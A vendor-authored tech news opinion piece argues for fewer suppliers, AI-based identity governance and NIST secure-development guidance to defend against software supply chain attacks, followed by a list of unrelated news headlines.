Defending against the threat of software supply chain attacks

Asia's Tech News Daily

The threat of software supply chain attacks has been well-known for years yet governments and businesses are still playing catch up. As a result of the transformation of digital life following the pandemic, cyber threats are increasing and businesses need to do more in order to protect themselves from such attacks.

One of the reasons software supply chain attacks are so potent is that they are so varied in terms of targets, methods and impacts. At a basic level, software supply chain attacks involve slipping malware or even a malicious component into a trusted piece of software or hardware. With one well-placed intrusion, attacks can ripple across a supplier’s network of customers – sometimes numbering thousands of victims.

About the author

Nick Caley is Vice President of ForgeRock for UK and Ireland.

Major attacks like SolarWinds and Keseya have exposed how much today’s organizations rely on third-party software suppliers, forcing the issue up the agenda in boardrooms and government.

But is enough being done? A 2021 survey by the UK’s Department of Culture, Media and Sport, found that only 12% of businesses have reviewed cybersecurity risks posed by suppliers. The UK government only recently launched a process looking into drawing up a set of minimum security standards for third-party suppliers involved in the government procurement process so official guidance will not be forthcoming for some time.

With attacks on the rise, protecting businesses from the scourge of software supply chain attacks is not only a business imperative: it’s crucial to help insulate the wider economy from ripple effects. So what can businesses do to prepare today?

Streamlining the software supply chain

A 2019 Gartner survey found that 60% of organizations work with more than a thousand third-party software suppliers and many expect that number to grow. Today’s digital supply chains are unprecedented in their scale and interconnectedness.

In order to minimize the risk of supply chain attacks, businesses should therefore aim to narrow their exposed perimeter, primarily by reducing the number of external suppliers they work with. As Toyota does with its hardware supply chain, focus should shift to relying on fewer suppliers with whom a relationship of deep trust and understanding is built. Working with fewer suppliers allows a business to concentrate its security and compliance efforts, and to work more proactively with trusted third-parties at all stages of the relationship.

Focus can then shift to ongoing monitoring efforts as opposed to relying on a more fixed-point-in-time approach centered on just initial due diligence or recertification down the line. Working with fewer suppliers allows supply chain security to be more regularly reviewed to adapt to incoming and evolving threats.

Securing access and entitlements within organizations

The pandemic has thrown up a host of cybersecurity challenges and organizations’ legacy identity governance solutions, which manually manage user access and monitor access privileges, are straining under the pressure. This is a dangerous context into which to throw the challenge of sprawling – and therefore exposed – software supply chains, making it increasingly difficult for cybersecurity teams to ensure that the right person has the access to the right applications at the right time.

The result is that organizations are left unsure of who has access to what and, more importantly, why they have access. ForgeRock’s Consumer Identity Breach Report found that 43% of US data breaches are caused by unauthorized access.

Manually managing the end-to-end identity lifecycle and access requests across growing digital supply chains is expensive, fraught with risk, and creates extensive compliance challenges. New workers, suppliers and partners joining the growing digital supply chain ecosystem can be easily overprovisioned, creating the risk of ‘entitlement creep’. Additionally, access for those who depart the ecosystem may not be sufficiently deprovisioned. This assessment of access rights is both a dynamic and ongoing demand which if left to form filling, ticking boxes and rubber stamping has underlying risk that exposes the organization to a potential breach.

The ability to use AI to automate access approvals, recommend certification for low-risk accounts, and automate removal of unnecessary roles frees up IT, compliance and security teams to focus on high-risk requests and overprovisioning of supplier and partner access. Tackling the issue of risky access using AI-powered identity governance solutions will ultimately make it more difficult for software supply chain attacks to take place.

Implement secure-by-design software development

When it comes to the development and distribution of third-party software, knowing the right questions to ask software suppliers is crucial in ensuring that their security is of the highest standards. A demanding and inquisitive approach will not only secure a company’s own digital supply chain, it will also strengthen trust in the ecosystem as a whole, especially on the part of government officials.

Luckily, the National Institute of Standards and Technology, a globally recognized standard-setting body within the US Department of Commerce, has published a widely-recognized framework establishing common language and a set of guidance for developers, vendors and officials involved in software development, distribution and procurement.

The suggested guidance from NIST focuses on ensuring that a business’s processes are prepared to perform secure software development at both an organization-level and for individual projects. It also focuses on protecting key products from tampering and unauthorized access. Also, strengthening processes to identify vulnerabilities as they arise and to prevent them occurring in future by implementing process improvements incrementally.

Implementing NIST’s guidance will allow businesses to monitor the cybersecurity of software suppliers and build trust with customers and partners across the digital supply chain.

Conclusion

With businesses set to face a fourfold increase in attacks in 2021 (according to the EU’s cybersecurity agency) it is crucial that all businesses involved in global software supply chains embrace a risk-informed approach to protect themselves and society. This can be done by streamlining their supply chains, implementing secure-by-design software development and adopting a modern, AI-powered identity governance solution. There no longer needs to be a compromise made between user productivity, experience and robust levels of security.

The recent White House meeting convened by the Biden administration for the CEOs of large American tech companies to discuss bolstering software supply chain security underscores that this will continue to be an important issue for all stakeholders for the foreseeable future. The stakes are too high to ignore.

  • We feature the best business VPN.
Internet Explorer Channel Network
Asia's Tech News Daily
News Related

OTHER NEWS

Visitors can take virtual tour of Skara Brae with new 3D model

Visitors can take a virtual tour of Skara Brae through a new digital 3D model of the Neolithic site. The Historic Environment Scotland (HES) model of the settlement in Orkney ... Read more »

Infinix Inbook X1, Inbook X1 Pro laptops to launch in India on December 8

NEW DELHI: After Xiaomi and Realme, now Infinix is also set to enter the laptop market in India. The company has confirmed that it will launch the Infinix Inbook X1 ... Read more »

Charlene White on the negative impact of 24 hour news consumption on our mental health

Charlene White speaks candidly about dangers of constant media consumption and how this can impact our mental health White Wine Question Time with Kate Thornton is the podcast that brings ... Read more »

Charlene White on becoming the first black woman to present the ITV News at 10, on keeping her identity in the media world, and her emotional journey to discover her Jamaican heritage

Journalist, newsreader and TV personality, Charlene White, speaks about the life-changing moment in which she made history, becoming the first black woman to ever present the ITV News at 10. ... Read more »

Rocket League mobile is now a thing, and we're not terribly impressed

Rocket League Sideswipe is now available on Android and iOS devices, offering a free-to-play mobile alternative to the online multiplayer phenomenon. Rocket League Sideswipe maintains the orange vs. blue head-to-head ... Read more »

IBM acquires hybrid cloud player in Australia

The acquisition will bring deeper experience to IBM on multicloud platforms. Read more »

Twitter bans sharing images of people without their consent

The move has prompted some criticism with the social media platform's users concerned that it could lead to censorship. Read more »

Tomb of horror: Mummy is found with hands bound and covering his face

Archaeologists Pieter Van Dalen Luna and Yomira Huaman beside the mummy which is estimated to be between 800 and 1,200 years old – AFP Discovering a mummy is always a ... Read more »

Elon Musk warns employees of potential SpaceX bankruptcy

San Francisco, SpaceX CEO Elon Musk in an email to his company’s employees asked them to work over the weekend on SpaceX’s Raptor engine as the company faces “genuine risk ... Read more »

Good Morning Britain: Robert Rinder in tears over anti-loneliness campaign

Robert Rinder became tearful on Good Morning Britain today (1 December) after watching the show’s anti-loneliness campaign video. The ITV programme is running its charitable campaign, 1 Million Minutes, for ... Read more »

Average traffic per smartphone in the India second-highest in the world: Ericsson

The average traffic per smartphone in the India region is the second-highest globally and is projected to grow to around 50GB per month in 2027. Total mobile data traffic in ... Read more »

Facebook, Instagram remove over 18.8 million content pieces in India in October

New Delhi: Meta, the newly-formed parent company of Facebook and its family of apps, on Wednesday said that it has removed over 18.8 million pieces of content in October on ... Read more »

Hawkeye episode 3 may have just confirmed the return of a fan-favorite character

Potentially major spoilers follow for Hawkeye episode 3. Hawkeye episode 3 has landed on Disney Plus – and it seems that the Marvel Phase 4 TV series may have already ... Read more »

Could Starfield surprise us twice over?

Bethesda’s space RPG Starfield is still a full year away, but a new teaser trailer has offered a key insight into the way the game might be structured. Game Director ... Read more »

This Italian-made e-bike could keep rolling for up to 200km

Italian company Noko has unveiled a trio of new e-bikes that it claims can keep running for up to 200km (or 124 miles). That’s not the greatest range of any ... Read more »

iPhone SE 3 rumored to launch before the end of March 2022

When is the iPhone SE 3 going to see the light of day? A new industry analyst report suggests it will be sometime during Q1 2022 – so January, February ... Read more »

The US government is trying to save Christmas from PS5 and RTX 3080 scalpers

A group of Democratic lawmakers introduced the Stopping Grinch Bots Act on Monday November 29 to try and prevent bots from buying up scarce, in-demand products like PlayStation 5 consoles ... Read more »

Why Britain needs to catch up on the new frontier of espionage

Just a few months ago, a group of hackers did something small, almost innocuous. They bought a stolen digital identity, known as a cookie, for £7.50. But that, by their ... Read more »

Still paying for antivirus software? Experts say you probably don't need it

Viruses are no longer the biggest threats for most users, particularly now that software updates itself automatically and so much personal computing happens over the internet. Read more »

EU to allow member states to detain migrants for 16 weeks in major weakening of asylum rights

Migrants are seen by the Bruzgi Transport and Logistics Centre, some 1.5 km northeast of Kuznica Bialostocka-Bruzgi border crossing on the Belarusian-Polish border. – Getty Images Brussels is set to ... Read more »

Zoom is bringing attendance status, chat flexibility and these new features

Ahead of the holiday season, video conferencing tool Zoom has updated its platform with a host of new features. These include enhanced slide control, ability to control polls, attendance status, ... Read more »

Razer's next gaming laptops will be pricier thanks to chip shortage

Razer has announced that its next-gen gaming laptops coming out in 2022 will be more expensive than current models. The bad news was delivered by the CEO of Razer, Min-Liang ... Read more »

Oppo's upcoming flagship smartphone to be powered by Snapdragon 8 Gen 1 chipset

NEW DELHI: Qualcomm finally unveiled its next-generation flagship chipset — Snapdragon 8 Gen 1. As promised the company has changed the naming scheme for the Snapdragon chipsets with the launch ... Read more »

Best text-to-speech software of 2021

The best text-to-speech apps make it simple and easy to reading documents aloud, on either your desktop, tablet, or phone. The best text-to-speech software Click the links below to go ... Read more »

Latest Oculus Quest 2 update lets you film yourself in VR – if you own an iPhone

The latest Oculus Quest 2 update brings mixed reality casting to the VR headset, effectively allowing you to film yourself in a virtual reality space. So far just six of ... Read more »

Apple AirPods prototype with transparent design surfaces on Twitter

Apple AirPods prototype with transparent design have surfaced on Twitter this week. The images of the prototype earbuds from Cupertino based tech giant has been shared by Giulio Zompetti who ... Read more »

Microsoft surface go 3 review: A light, portable and effective tablet

It has the same design, upgraded processor and software but a downgraded price – it’s £30 less than the surface go 2 (iStock/The Independent) Microsoft, of course, makes Windows, the ... Read more »

Which upcoming phones will use the Qualcomm Snapdragon 8 Gen 1?

The new Qualcomm Snapdragon 8 Gen 1 is official, and it’s set to power some of the very best smartphones of 2022. Flights and accommodation for this launch event were ... Read more »

Samsung Galaxy S21 FE leak shows off all the phone's color options

The Samsung Galaxy S21 FE has traveled a long and winding road on its journey to being launched, but it seems that it’s now very close to being officially unveiled ... Read more »

Xbox series X stock – live: Argos restock now sold out – how to get a console

LIVE – Updated at 09:25 © iStock/The Independent XBOX LB1 INDYBEST.jpg Update: The Xbox series X is now sold out at Argos. Read on for more details. The Xbox series ... Read more »

‘Call of Duty: Warzone Pacific': New Caldera map goes live for everyone next week with 15 drop zones

Photo credit: Call of Duty / YouTube screenshot Next week is going to be huge for “Call of Duty: Vanguard” and “Warzone” players as it is when the integration of ... Read more »

What will happen when Elon Musk's Gigafactory faces the wurst?

News here in Germany is that Elon Musk’s Gigafactory in Brandenburg is about to start production.  As an Ausländer myself who has lived in East Germany (Berlin and Leipzig) for ... Read more »

Omicron: Experts fear new Covid variant will impact effectiveness of key drugs for vulnerable patients

(AFP via Getty Images) Scientists fear the omicron coronavirus variant will reduce the effectiveness of key drugs that are used to treat Covid-19 in vulnerable patients. As with the vaccines, ... Read more »

F1's Lando Norris on moving to Monaco: ‘People do many things in life for money'

Lando Norris drives for McLaren (Getty Images) F1 driver Lando Norris has revealed he will move to Monaco at the end of the season, saying: “People do many things in ... Read more »

Damning video of jury vehicle incident that got MSNBC banned from covering Rittenhouse trial released by police

Kenosha police in Wisconsin have released footage of an NBC journalist who allegedly followed a vehicle transporting jury members of the Kyle Rittenhouse trial. Judge Bruce Schroeder, who presided over ... Read more »

Steam Deck will not have exclusive games, Valve confirms

Steam Deck | Photo credit: Valve / YouTube screenshot Valve is the next video game company to release its gaming hardware, the Steam Deck. And Valve has already clarified it ... Read more »

Android Apps that stole bank credentials were downloaded 300,000 times

The apps posed as QR and PDF scanners Mobile security company ThreatFabric discovered apps on Google’s Play Store for Android that managed to deceive people into downloading them more than ... Read more »

Android TV 12 gets official release, no word on when it will come to Chromecast with Google TV

Android TV 12 has been finally released, a while after its smartphone counterpart was announced. Yet, there is no official information about its arrival on consumer devices. 9to5Google reports that ... Read more »

Xbox series X stock – live: Argos restock is available now – how to get a console

LIVE – Updated at 08:48 © iStock/The Independent XBOX LB1 INDYBEST.jpg Update: The Xbox series X is in stock at Argos. Read on for more details. The Xbox series X ... Read more »

Video: HIV stigma can be reduced with 'more people going public'

More role models are needed to help tackle the stigma of HIV, says the chair of the Elton John AIDS Foundation - people who can say "I'm living a full, happy, healthy life." Read more »
On free-english-test.com you will find lots of free English exam practice materials to help you improve your English skills: grammar, listening, reading, writing, ielts, toeic